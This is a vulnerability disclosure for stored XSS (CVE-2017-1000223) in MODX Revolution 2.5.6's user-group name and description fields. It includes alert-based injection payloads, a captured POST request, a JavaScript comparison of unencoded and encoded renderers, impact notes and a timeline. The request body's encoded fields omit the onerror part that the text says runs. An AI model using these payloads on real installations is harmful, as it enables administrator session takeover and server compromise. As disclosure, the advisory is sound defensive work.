Date

Information

Name: MODX Revolution 2.5.6
Software: MODX CMS
Homepage: https://modx.com
Vulnerability: stored WCI (web content injection, a.k.a. stored XSS)
Prerequisites: the attacker needs to be authenticated and to have permission to edit user groups
Severity: medium
CVE: CVE-2017-1000223

Description

Several stored WCI (a.k.a. XSS) vulnerabilities were discovered in the latest MODX Revolution code (2.5.6 at the time of the report). An authenticated user with permission to edit user groups can use them to execute malicious JavaScript in the browsers of other manager users and possibly take over their accounts.

Proof of Concept

The functionality is located at:

(settings) -> Access Control Lists -> User Group & Users -> New User Group -> Name

Set the name of the group to:

<h1 style=color:red>Malicious</h1><img src=x onerror=alert(1)>

Set the description of the group to:

<h1 style=color:red>Malicious group</h1><img src=x onerror=alert(2)>

The following request is sent when the form is saved:

POST /connectors/index.php HTTP/1.1
Host: victim.site
modAuth: modx58dd6b78abecd0.81702322_158e1f669c75121.62443671
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 303
Cookie: PHPSESSID=mq0kub9tiu3dv7l00ec472n9v6
Connection: close

action=security%2Fgroup%2Fcreate&HTTP_MODAUTH=modx58dd6b78abecd0.81702322_158e1f669c75121.62443671&parent=0&name=%3Ch1%20style%3Dcolor%3Ared%3EMalicious%3C%2Fh1%3E&description=%3Ch1%20style%3Dcolor%3Ared%3EMalicious%20group%3C%2Fh1%3E&aw_users=&aw_resource_groups=&aw_contexts=web&policy=&aw_categories=

The payload is executed when a victim views any manager page on which the group name or description is rendered without HTML encoding; alert(1) fires from the name field and alert(2) from the description field.
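As an added illustration (not code from this advisory or from MODX), the following JavaScript shows why the stored value executes: a manager grid renderer that concatenates the stored group name and description straight into markup, next to the same renderer with HTML encoding applied at output. The record shape, the renderer functions and the htmlEncode helper are assumptions standing in for the manager's ExtJS code; the sample records are constructed from the PoC payloads above.

```javascript
// Added example, not MODX code. Shows the unencoded rendering that turns a stored
// group name into live HTML, and the output-encoding fix. Names are assumptions.

// Constructed sample records, modelled on the PoC request body above.
const sampleGroups = [
  { id: 1, name: 'Administrator', description: 'Built-in group' },
  {
    id: 2,
    name: '<h1 style=color:red>Malicious</h1><img src=x onerror=alert(1)>',
    description: '<h1 style=color:red>Malicious group</h1><img src=x onerror=alert(2)>',
  },
];

// Minimal HTML entity encoder, equivalent in effect to Ext.util.Format.htmlEncode
// (assumption: the real manager uses ExtJS renderers; this helper stands in for it).
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable renderer: interpolates the stored value directly into markup,
// so the stored payload becomes real elements and the onerror handler runs.
function renderRowVulnerable(group) {
  return `<tr><td>${group.name}</td><td>${group.description}</td></tr>`;
}

// Hardened renderer: encode every untrusted field at the point it is written
// into HTML. The browser shows the payload as text and creates no <img>.
function renderRowSafe(group) {
  return `<tr><td>${htmlEncode(group.name)}</td><td>${htmlEncode(group.description)}</td></tr>`;
}

function renderTable(groups, renderRow) {
  return '<table>' + groups.map(renderRow).join('') + '</table>';
}

// Demonstration-only check: after removing the tags the renderer itself emits,
// does any raw '<' survive? In the encoded output every '<' from user data has
// become '&lt;', so nothing is left that the browser would parse as a tag.
function containsInjectedMarkup(html) {
  const stripped = html.replace(/<\/?(?:table|tr|td)>/g, '');
  return stripped.includes('<');
}

// Stand-alone run: compare both renderers over the constructed records.
const vulnerableHtml = renderTable(sampleGroups, renderRowVulnerable);
const safeHtml = renderTable(sampleGroups, renderRowSafe);
console.log('vulnerable renderer injects markup:', containsInjectedMarkup(vulnerableHtml));
console.log('hardened renderer injects markup:  ', containsInjectedMarkup(safeHtml));
```

The fix is the same wherever the value is displayed: encode at output, in every renderer, tooltip and title that touches the stored string, rather than trying to strip HTML once on input, since the group name is stored verbatim and reused in many manager views.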

Impact

An attacker with permission to edit user groups can use this functionality to execute malicious JavaScript in the browsers of other manager users and take control of their sessions. If one of those victims is a site administrator, this leads to full site compromise, since an administrator can execute arbitrary PHP on the server, for example by installing a plugin.

Conclusion

An authenticated attacker with permission to edit user groups can take over an administrator's session and, through it, execute PHP code on the server.

The following release has been published to mitigate the issue: https://modx.com/blog/modx-revolution-2.5.7 (note from the timeline below that problems with the fix were reported to the developers and received no response).

Timeline

  • 01.04.2017 | me > developer     | vulnerability discovered
  • 03.04.2017 | me > developer     | sent the report to the developers
  • 13.04.2017 | developer > me     | acknowledged the finding
  • 21.04.2017 | developer > public | new version released
  • 29.04.2017 | me > developer     | reported issues with the fix; no response
  • 22.08.2017 | DWF > developer    | CVE assigned
  • 31.08.2017 | me > public        | full disclosure